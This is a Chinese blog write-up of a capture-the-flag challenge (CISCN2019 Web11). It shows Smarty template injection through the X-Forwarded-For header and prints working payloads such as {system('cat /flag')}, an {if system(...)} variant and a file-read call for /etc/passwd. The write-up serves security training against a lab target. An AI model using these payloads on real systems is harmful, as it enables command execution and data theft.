[CISCN2019 华东南赛区]Web11

最新推荐文章于 2024-07-26 17:57:56 发布
最新推荐文章于 2024-07-26 17:57:56 发布
阅读量379 收藏 1
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hopeace/article/details/120770189
版权

题目名:[CISCN2019 华东南赛区]Web11

作者:Hopeace

靶场地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA]Web11

知识点:Smarty模板注入注入点的选取

0x01浏览题目

Ip Address API 应该是一个查看IP的接口

Why use?第一个是越权访问,第二个是隐藏个人信息

Api Usage

-API URITypeSample Output
get IPhttp://node4.buuoj.cn:29602/apitext/html8.8.8.8
get XFF(X-Forwarded-For)http://node4.buuoj.cn:29602/xfftext/html8.8.8.8

Request-Header

GET / HTTP/2.0
Host: www.ip.la
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8
Cache-Control: max-age=0
Dnt: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36

右上角调用了我们的Ip信息

Current IP:113.247.230.213

页面最底下是相关模板信息

Build With Smarty !

0x01 分析题目

关键词有Smarty , IP , XFF

自然是先去搜索模板注入,看能不能利用注入修改ip等头文件信息

Smarty模板注入

Smarty 旧版本中有{php}phpinfo(){/php}

Php5 里有

Literal标签

{literal} {/literal}

if标签

{if phpinfo()}{/if}

抓包测试

网页中的8.8.8.8明显是我请求头中的X-Forwarded-For

修改为{7*7}

看到回显49

则证明存在模板注入

{system(‘ls /’)} 查看根目录

发现了flag

{system(‘cat /flag’)}

flag{a2fdf7d1-8db7-4d94-bd62-7c9b44e59afd}

0x03题目补充

{$smarty.version}查看版本号

3.1.30

{literal} {/literal}

没有想要的回显

静态方法

{self::getStreamVariable(“file:///etc/passwd”)}

也不适用于此版本

{if system(‘ls /’)}{/if}

得到了回显,也就是说

{if system(‘cat /flag’)}{/if}也可以成功执行

Hopeace
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"Double ciscn 2019 第十二届全国大学生信息安全竞赛"揭示了这是一个信息安全领域的竞赛,特别是针对大学生的。"全国大学生信息安全竞赛"是中国一项具有高影响力的年度赛事,旨在提升大学生的信息安全技能,...
华东师范大学2019 839.docx
06-25
华东师范大学2019年839计算机考研真题解析】 本次华东师范大学计算机技术(085211)专业2019年的839科目考试涵盖了几大核心的计算机编程和算法相关知识点,主要包括数据结构、指针、递归、函数指针以及随机数生成...
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 643
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
[CISCN 2019华东]Web11
observer的博客
05-10 281
[CISCN 2019华东]Web11
BUUCTF [CISCN2019 华东赛区]Web11
qq_56313338的博客
08-15 157
X-Forwarded-For 是一个 HTTP 扩展头部,用来描述请求者的ip。如果后端认为这个是我们的真实ip并使用Smarty来回显那么就可能造成了SSTI。看到这个ip我们应该想到使用X-Forwarded-For字段。这里响应后你看到应该是空的,ctrl + u 查看源代码。时 IP会先为2,那么说明了此处就是有SSTI漏洞。上面可以看出这是Smarty模板引擎。
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2716
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
web buuctf [CISCN2019 华东赛区]Web11
weixin_44214568的博客
04-07 459
知识点:1.SSTI(smarty模板) 2.XFF 1.开题: a.题目标明smarty,这是用php编写的比较著名的模板引擎,猜测很可能和模板注入有关系 b.提示xff 2.利用bp抓包,添加xff并尝试模板注入 很明显存在SSTI 3.改payload={system('ls')} 分别cat没有flag 猜测可能在目录下面 'cat ../../../flag'(前面有几个../需要挨个试一下) flag{3941b25d-8279-47eb-...
BUUCTF-WEBCISCN2019 华东赛区Web11 1
qq_36410265的博客
02-08 309
其实打开这张页面,我并不知道这道题是什么类型。只好先用bp去请求这两个接口。请求xff的时候,我添加了 xff头,值为127.0.0.1。回显了127.0.0.1。我就猜到是模板注入题了,加上页面上的关键字。,Smarty模板注入题,找了几个payload,没什么过滤,直接就回显了。以为这道题跟ikun那道题一样,考的知识点很多,是我想得复杂了。
BUUCTF:[CISCN2019 华东赛区]Web4
末初的CSDN博客
07-29 2132
题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA]Web4 这种路由处理方式并不像是PHP,尝试了file:///etc/passwd没有效果,猜测Flask,尝试local_file:///读取文件 读取源码: import re, random, uuid, urllib from flask import Flask, session, request app
[CISCN2019 华东赛区]Web4
m0_62905261的博客
08-31 723
[CISCN2019 华东赛区]Web4
BUUCTF [CISCN2019 华东赛区]Web4
SanKobe的博客
05-24 283
注意这里有个坑,目标地址设备是用python2跑的,而我这里是python3,之前我一直用这个当SECRET_KEY,然后一直跑不出flag,百度了一下,python2和python3 random出来的位数是不一样的。最近打比赛遇到了flask_session伪造相关的题目,没学过,又碰巧随机挑了道BUUCTF的题目正好考的flask_session伪造,看完各位师傅的WP后,进行一次自我总结。百度了一下linux下设备网卡地址在/sys/class/net/eth0/address下。
华东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
### 华东师范大学2019计算机考研839试卷及答案解析 #### 一、问答题 **题目:**举例说明内部链接与外部链接的区别。 **知识点:** 1. **内部链接:**指的是网站内部页面之间的链接关系,即一个网页指向同一网站中...
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
第九届飞思卡尔摄像头华东赛区一等奖程序
08-24
在本项目中,参赛团队成功地获得了第九届飞思卡尔智能车竞赛华东赛区的一等奖,这是一个高度技术性的比赛,展示了团队在嵌入式系统设计和自动驾驶技术方面的卓越能力。主控芯片选择的是K60,这是一款由NXP(原...
PHP商城案例
最新发布
王世凡的技术博客
07-26 287
http://www.e9933.com/
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 856
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 652
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值